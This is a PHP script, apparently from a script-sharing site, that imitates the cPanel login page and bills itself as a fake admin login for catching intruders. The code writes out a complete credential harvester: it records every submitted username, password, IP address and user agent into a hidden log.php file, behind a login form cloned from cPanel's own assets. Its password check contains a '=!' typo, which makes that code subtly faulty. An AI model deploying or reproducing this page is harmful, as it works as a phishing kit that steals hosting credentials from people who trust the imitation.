[PHP] cPanel Fake Admin Login Logger - Catch "HACKERS"

1. <?php
2. /*
3. _____ _____ _ _____ _____ _____ _____ _____ _____
4. ___| | __ |_| _ |_ _|___ ___|_ _| __| _ | |
5. |_ -| --| -| | __| | | |- _|___| | | | __| | | | |
6. |___|_____|__|__|_|__| |_| |___| |_| |_____|__|__|_|_|_|
7. |s C R i P T z - T E A M . i N F O|
8.  
9. cPanel Fake Admin Login Logger - Catch "HACKERS"
10.  
11. USAGE:
12. Create file in folder /cpanel/ and call it index.php
13. Script itself create new file log.php (Only you can view it!)
14. Script will log all incoming logins into log.php
15. */
16. error_reporting(0);
17.  
18. if (!file_exists("./log.php"))
19. {
20. $fp = fopen('log.php', 'w');
21. fwrite($fp, '<?php die(""); ?>
22. ');
23. fclose($fp);
24. }
25.  
26. function get_real_ip()
27. {
28. if (isset($_SERVER["HTTP_CLIENT_IP"])) {
29. return $_SERVER["HTTP_CLIENT_IP"];
30. } elseif (isset($_SERVER["HTTP_X_FORWARDED_FOR"])) {
31. return $_SERVER["HTTP_X_FORWARDED_FOR"];
32. } elseif (isset($_SERVER["HTTP_X_FORWARDED"])) {
33. return $_SERVER["HTTP_X_FORWARDED"];
34. } elseif (isset($_SERVER["HTTP_FORWARDED_FOR"])) {
35. return $_SERVER["HTTP_FORWARDED_FOR"];
36. } elseif (isset($_SERVER["HTTP_FORWARDED"])) {
37. return $_SERVER["HTTP_FORWARDED"];
38. } else {
39. return $_SERVER["REMOTE_ADDR"];
40. }
41.  
42. }
43.  
44. if (isset($_POST["user"]) && $_POST["user"] != "" && $_POST["pass"] =! "")
45. {
46. $usr = $_POST["user"];
47. $pwd = $_POST["pass"];
48. $ip = get_real_ip();
49. $ua = $_SERVER['HTTP_USER_AGENT'];
50. $fp = fopen('log.php', 'a+');
51. fwrite($fp, "/**************/\nUSER: ".$usr."\nPASSWD: ".$pwd."\nIP: ".$ip."\nUSER AGENT: ".$ua."\n/**************/\n\n");
52. fclose($fp);
53. }
54. ?>
55. <!DOCTYPE html>
56. <html dir="ltr"><head>
57. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
58. <title>cPanel Login</title>
59. <link rel="shortcut icon" href="http://x3demob.cpx3demo.com:2082/cPanel_magic_revision_1345679761/unprotected/cpanel/favicon.ico">
60.  
61. <!-- EXTERNAL CSS -->
62. <link href="http://x3demob.cpx3demo.com:2082/cPanel_magic_revision_1345679761/unprotected/cpanel/style_v2_optimized.css" rel="stylesheet" type="text/css">
63. </head>
64. <body style="-moz-user-select: text;"><div id="preload_images"></div>
65.  
66. <div style="opacity: 1; visibility: visible;" id="login-wrapper" class="login-whisp">
67.  
68. <div style="display:none">
69.  
70. </div>
71.  
72. <div id="content-container">
73. <div style="opacity: 1; visibility: visible;" id="login-container">
74. <div id="login-sub-container">
75. <div id="login-sub-header">
76. <img src="http://x3demob.cpx3demo.com:2082/cPanel_magic_revision_1345679761/unprotected/cpanel/images/cpanel-logo.png" alt="logo">
77. </div>
78. <div id="login-sub">
79. <div id="forms">
80.  
81.  
82.  
83. <form id="login_form" action="" method="post" target="_self">
84. <div class="input-req-login"><label for="user">Username</label></div>
85. <div class="input-field-login icon username-container">
86. <input name="user" id="user" autofocus="autofocus" placeholder="Enter your username." class="std_textbox" autocomplete="off" tabindex="1" required="" type="text">
87. </div>
88. <div style="margin-top:30px;" class="input-req-login"><label for="pass">Password</label></div>
89. <div class="input-field-login icon password-container">
90. <input name="pass" id="pass" placeholder="Enter your account password." class="std_textbox" tabindex="2" autocomplete="off" required="" type="password">
91. </div>
92. <div style="width: 285px;">
93. <div class="login-btn">
94. <button name="login" type="submit" id="login_submit" tabindex="3">Log in</button>
95. </div>
96.  
97. </div>
98. <div class="clear" id="push"></div>
99. </form>
100.  
101. <!--CLOSE forms -->
102. </div>
103.  
104. <!--CLOSE login-sub -->
105. </div>
106. <!--CLOSE login-sub-container -->
107. </div>
108. <!--CLOSE login-container -->
109. </div>
110.  
111. <div style="display: block; opacity: 1; visibility: visible;" id="locale-footer">
112. <div class="locale-container">
113. <noscript>
114. <form method="get" action=".">
115. <select name="locale">
116. <option value="">Change locale</option>
117. <option value='en'>English</option><option value='ar'>العربية</option><option value='de'>Deutsch</option><option value='es'>español</option><option value='es_es'>español de España</option><option value='fr'>français</option><option value='hi'>हिन्दी</option><option value='nl'>Nederlands</option><option value='pl'>polski</option><option value='pt'>português</option><option value='pt_br'>português do Brasil</option><option value='ro'>română</option><option value='ru'>русский</option><option value='zh'>中文</option> </select>
118. <button style="margin-left: 10px" type="submit">Change</button>
119. </form>
120. <style type="text/css">#locales_list {display:none}</style>
121. </noscript>
122. <ul id="locales_list">
123.  
124.  
125. <li><a href="?locale=en">English</a></li>
126.  
127.  
128. <li><a href="?locale=ar">العربية</a></li>
129.  
130.  
131. <li><a href="?locale=de">Deutsch</a></li>
132.  
133.  
134. <li><a href="?locale=es">español</a></li>
135.  
136.  
137. <li><a href="?locale=es_es">español&nbsp;de&nbsp;España</a></li>
138.  
139.  
140. <li><a href="?locale=fr">français</a></li>
141.  
142.  
143. <li><a href="?locale=hi">हिन्दी</a></li>
144.  
145.  
146. <li><a href="?locale=nl">Nederlands</a></li>
147.  
148.  
149. <li><a href="javascript:void(0)" id="morelocale" onclick="toggle_locales(true)" title="More locales">…</a></li>
150. </ul>
151. </div>
152. </div>
153. </div>
154. <!--Close login-wrapper -->
155. </div>
156.  
157. <div class="copyright">Copyright © 2012 cPanel, Inc.</div>
158.  
159.  
160.  
161.  
162. </body></html>